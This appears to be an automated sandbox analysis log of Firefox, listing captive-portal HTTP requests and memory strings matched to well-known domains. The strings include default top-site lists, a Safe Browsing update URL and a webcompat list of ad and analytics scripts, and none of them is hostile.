Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache

Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/UpdateService.canUsuallyCheckForUpdates - unable to automatically check for updates, the option has been disabled by the administrator.jar:file:///C:/Program%20Files/Mozilla%20Firefox/browser/features/pictureinpicture@mozilla.org.xpi!/experiment-apis/aboutConfigPipPrefs.js equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/UpdateService.canUsuallyCheckForUpdates - unable to automatically check for updates, the option has been disabled by the administrator.jar:file:///C:/Program%20Files/Mozilla%20Firefox/browser/features/pictureinpicture@mozilla.org.xpi!/experiment-apis/aboutConfigPipPrefs.js equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: BETWEEN 'www.' \|\| :strippedURL AND 'www.' \|\| :strippedURL \|\| X'FFFF'moz-extension://a581a2f1-688c-434b-8db8-16166b1993d9/lib/intervention_helpers.jsIt looks like you are passing several store enhancers to createStore(). This is not supported. Instead, compose them together to a single functionYou may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/MHYwEAYHKoZIzj0CAQYFK4EEACIDYgAEYyj8zLJVJc//j1xARfPx+oE/xqqM7O7tEZ9+XMWBeEQCqbJZRV8YS8VVq7GffqygmqryEGBhGRP5MX05XlfMO0cKletwojy/g/uWNoFAMYM3K/5640rSS53JHtjagJJEhttps://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=AIzaSyC7jsptDS3am4tPx4r3nxis7IMjBc5Dovo&$httpMethod=POST[{incognito:null, tabId:null, types:null, urls:["https://watch.sling.com/", "https://www.sling.com/"], windowId:null}, ["blocking", "requestHeaders"]] equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: BETWEEN 'www.' \|\| :strippedURL AND 'www.' \|\| :strippedURL \|\| X'FFFF'moz-extension://a581a2f1-688c-434b-8db8-16166b1993d9/lib/intervention_helpers.jsIt looks like you are passing several store enhancers to createStore(). This is not supported. Instead, compose them together to a single functionYou may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/MHYwEAYHKoZIzj0CAQYFK4EEACIDYgAEYyj8zLJVJc//j1xARfPx+oE/xqqM7O7tEZ9+XMWBeEQCqbJZRV8YS8VVq7GffqygmqryEGBhGRP5MX05XlfMO0cKletwojy/g/uWNoFAMYM3K/5640rSS53JHtjagJJEhttps://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=AIzaSyC7jsptDS3am4tPx4r3nxis7IMjBc5Dovo&$httpMethod=POST[{incognito:null, tabId:null, types:null, urls:["https://watch.sling.com/", "https://www.sling.com/"], windowId:null}, ["blocking", "requestHeaders"]] equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: BETWEEN 'www.' \|\| :strippedURL AND 'www.' \|\| :strippedURL \|\| X'FFFF'moz-extension://a581a2f1-688c-434b-8db8-16166b1993d9/lib/intervention_helpers.jsIt looks like you are passing several store enhancers to createStore(). This is not supported. Instead, compose them together to a single functionYou may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/MHYwEAYHKoZIzj0CAQYFK4EEACIDYgAEYyj8zLJVJc//j1xARfPx+oE/xqqM7O7tEZ9+XMWBeEQCqbJZRV8YS8VVq7GffqygmqryEGBhGRP5MX05XlfMO0cKletwojy/g/uWNoFAMYM3K/5640rSS53JHtjagJJEhttps://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=AIzaSyC7jsptDS3am4tPx4r3nxis7IMjBc5Dovo&$httpMethod=POST[{incognito:null, tabId:null, types:null, urls:["https://watch.sling.com/", "https://www.sling.com/"], windowId:null}, ["blocking", "requestHeaders"]] equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000003.2792631818.000001DEFA713000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3049413497.000001DEEC2C6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2933112137.000001DEF03AB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ://www.facebook.com/platform/impression.php equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: --autocomplete-popup-separator-color--panel-banner-item-update-supported-bgcolor://.adsafeprotected.com//unit/://www.facebook.com/platform/impression.phpexecuteIDB/promise</transaction.onerror equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000002.3025366411.000001DEEB903000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: -l10n-id="newtab-menu-content-tooltip" data-l10n-args="{"title":"Wikipedia"}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.reddit.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="R"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/reddit-com@2x.png)"></div></div></div><div class="title"><span dir="auto">Reddit<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{"title":"Reddit"}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer hide-for-narrow"><div class="top-site-inner"><a class="top-site-button" href="https://twitter.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="T"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/twitter-com@2x.png)"></div></div></div><div class="title"><span dir="auto">Twitter<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{"title":"Twitter"}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer placeholder hide-for-narrow"><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li></ul><div class="edit-topsites-wrapper"></div></div></section></div></div></div></div><style data-styles="[[null]]"></style></div><div class="discovery-stream ds-layout"><div class="ds-column ds-column-12"><div class="ds-column-grid"><div></div></div></div><style data-styles="[[null]]"></style></div></div></main></div></div> equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001C.00000003.2880681828.000001DEFA65E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: 8://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000002.3025366411.000001DEEB984000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3025366411.000001DEEB9A1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2900139173.000001DEF6967000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: 8https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000002.3025366411.000001DEEB984000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3025366411.000001DEEB9A1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2900139173.000001DEF6967000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: 8https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000003.2880681828.000001DEFA65E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: 8www.facebook.com equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Scheme should be either http or https_injectDefaultProtocolHandlersIfNeededhttps://mail.yahoo.co.jp/compose/?To=%shttps://poczta.interia.pl/mh/?mailto=%shttp://www.inbox.lv/rfc2368/?value=%sisDownloadsImprovementsAlreadyMigratedhttp://win.mail.ru/cgi-bin/sentmsg?mailto=%shandlerSvc fillHandlerInfo: don't know this type@mozilla.org/uriloader/local-handler-app;1@mozilla.org/uriloader/dbus-handler-app;1 equals www.yahoo.com (Yahoo)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD57000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: [{incognito:null, tabId:null, types:["script"], urls:["://webcompat-addon-testbed.herokuapp.com/shims_test.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js", "://track.adform.net/serving/scripts/trackpoint/", "://track.adform.net/serving/scripts/trackpoint/async/", "://.adnxs.com//ast.js", "://.adnxs.com//pb.js", "://.adnxs.com//prebid", "://www.everestjs.net/static/st.v3.js", "://static.adsafeprotected.com/vans-adapter-google-ima.js", "://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "://cdn.branch.io/branch-latest.min.js", "://pub.doubleverify.com/signals/pub.js", "://c.amazon-adsystem.com/aax2/apstag.js", "://auth.9c9media.ca/auth/main.js", "://static.chartbeat.com/js/chartbeat.js", "://static.chartbeat.com/js/chartbeat_video.js", "://static.criteo.net/js/ld/publishertag.js", "://.imgur.com/js/vendor..bundle.js", "://.imgur.io/js/vendor..bundle.js", "://www.rva311.com/static/js/main..chunk.js", "://web-assets.toggl.com/app/assets/scripts/.js", "://libs.coremetrics.com/eluminate.js", "://connect.facebook.net//sdk.js", "://connect.facebook.net//all.js", "://secure.cdn.fastclick.net/js/cnvr-launcher//launcher-stub.min.js", "://www.google-analytics.com/analytics.js", "://www.google-analytics.com/gtm/js", "://www.googletagmanager.com/gtm.js", "://www.google-analytics.com/plugins/ua/ec.js", "://ssl.google-analytics.com/ga.js", "://s0.2mdn.net/instream/html5/ima3.js", "://imasdk.googleapis.com/js/sdkloader/ima3.js", "://www.googleadservices.com/pagead/conversion_async.js", "://www.googletagservices.com/tag/js/gpt.js", "://pagead2.googlesyndication.com/tag/js/gpt.js", "://pagead2.googlesyndication.com/gpt/pubads_impl_.js", "://securepubads.g.doubleclick.net/tag/js/gpt.js", "://securepubads.g.doubleclick.net/gpt/pubads_impl_.js", "://script.ioam.de/iam.js", "://cdn.adsafeprotected.com/iasPET.1.js", "://static.adsafeprotected.com/iasPET.1.js", "://adservex.media.net/videoAds.js", "://.moatads.com//moatad.js", "://.moatads.com//moatapi.js", "://.moatads.com//moatheader.js", "://.moatads.com//yi.js", "://.imrworldwide.com/v60.js", "://cdn.optimizely.com/js/.js", "://cdn.optimizely.com/public/.js", "://id.rambler.ru/rambler-id-helper/auth_events.js", "://media.richrelevance.com/rrserver/js/1.2/p13n.js", "://www.gstatic.com/firebasejs//firebase-messaging.js", "://.vidible.tv//vidible-min.js", "://vdb-cdn-files.s3.amazonaws.com//vidible-min.js", "://js.maxmind.com/js/apis/geoip2//geoip2.js", "://s.webtrends.com/js/advancedLinkTracking.js", "://s.webtrends.com/js/webtrends.js", "://s.webtrends.com/js/webtrends.min.js"], windowId
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD57000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: [{incognito:null, tabId:null, types:["script"], urls:["://webcompat-addon-testbed.herokuapp.com/shims_test.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js", "://track.adform.net/serving/scripts/trackpoint/", "://track.adform.net/serving/scripts/trackpoint/async/", "://.adnxs.com//ast.js", "://.adnxs.com//pb.js", "://.adnxs.com//prebid", "://www.everestjs.net/static/st.v3.js", "://static.adsafeprotected.com/vans-adapter-google-ima.js", "://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "://cdn.branch.io/branch-latest.min.js", "://pub.doubleverify.com/signals/pub.js", "://c.amazon-adsystem.com/aax2/apstag.js", "://auth.9c9media.ca/auth/main.js", "://static.chartbeat.com/js/chartbeat.js", "://static.chartbeat.com/js/chartbeat_video.js", "://static.criteo.net/js/ld/publishertag.js", "://.imgur.com/js/vendor..bundle.js", "://.imgur.io/js/vendor..bundle.js", "://www.rva311.com/static/js/main..chunk.js", "://web-assets.toggl.com/app/assets/scripts/.js", "://libs.coremetrics.com/eluminate.js", "://connect.facebook.net//sdk.js", "://connect.facebook.net//all.js", "://secure.cdn.fastclick.net/js/cnvr-launcher//launcher-stub.min.js", "://www.google-analytics.com/analytics.js", "://www.google-analytics.com/gtm/js", "://www.googletagmanager.com/gtm.js", "://www.google-analytics.com/plugins/ua/ec.js", "://ssl.google-analytics.com/ga.js", "://s0.2mdn.net/instream/html5/ima3.js", "://imasdk.googleapis.com/js/sdkloader/ima3.js", "://www.googleadservices.com/pagead/conversion_async.js", "://www.googletagservices.com/tag/js/gpt.js", "://pagead2.googlesyndication.com/tag/js/gpt.js", "://pagead2.googlesyndication.com/gpt/pubads_impl_.js", "://securepubads.g.doubleclick.net/tag/js/gpt.js", "://securepubads.g.doubleclick.net/gpt/pubads_impl_.js", "://script.ioam.de/iam.js", "://cdn.adsafeprotected.com/iasPET.1.js", "://static.adsafeprotected.com/iasPET.1.js", "://adservex.media.net/videoAds.js", "://.moatads.com//moatad.js", "://.moatads.com//moatapi.js", "://.moatads.com//moatheader.js", "://.moatads.com//yi.js", "://.imrworldwide.com/v60.js", "://cdn.optimizely.com/js/.js", "://cdn.optimizely.com/public/.js", "://id.rambler.ru/rambler-id-helper/auth_events.js", "://media.richrelevance.com/rrserver/js/1.2/p13n.js", "://www.gstatic.com/firebasejs//firebase-messaging.js", "://.vidible.tv//vidible-min.js", "://vdb-cdn-files.s3.amazonaws.com//vidible-min.js", "://js.maxmind.com/js/apis/geoip2//geoip2.js", "://s.webtrends.com/js/advancedLinkTracking.js", "://s.webtrends.com/js/webtrends.js", "://s.webtrends.com/js/webtrends.min.js"], windowId
Source: firefox.exe, 0000001C.00000003.2900139173.000001DEF6967000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: `https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000003.2900139173.000001DEF6967000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: `https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://vk.com/,https://www.youtube.com/,https://ok.ru/,https://www.avito.ru/,https://www.aliexpress.com/,https://www.wikipedia.org/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://vk.com/,https://www.youtube.com/,https://ok.ru/,https://www.avito.ru/,https://www.aliexpress.com/,https://www.wikipedia.org/https://www.baidu.com/,https://www.zhihu.com/,https://www.ifeng.com/,https://weibo.com/,https://www.ctrip.com/,https://www.iqiyi.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000002.3025366411.000001DEEB984000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3025366411.000001DEEB9A1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2900139173.000001DEF6967000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000002.3025366411.000001DEEB984000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3025366411.000001DEEB9A1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2900139173.000001DEF6967000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/[{incognito:null, tabId:null, types:null, urls:["://business.help.royalmail.com/app/webforms/"], windowId:null}, ["blocking", "requestHeaders"]] equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/[{incognito:null, tabId:null, types:null, urls:["://business.help.royalmail.com/app/webforms/"], windowId:null}, ["blocking", "requestHeaders"]] equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/[{incognito:null, tabId:null, types:null, urls:["://business.help.royalmail.com/app/webforms/"], windowId:null}, ["blocking", "requestHeaders"]] equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2955222099.000001D14E80A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2957984264.000001729E70C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2955222099.000001D14E80A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2957984264.000001729E70C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2955222099.000001D14E80A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2957984264.000001729E70C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.youtube.com (Youtube)
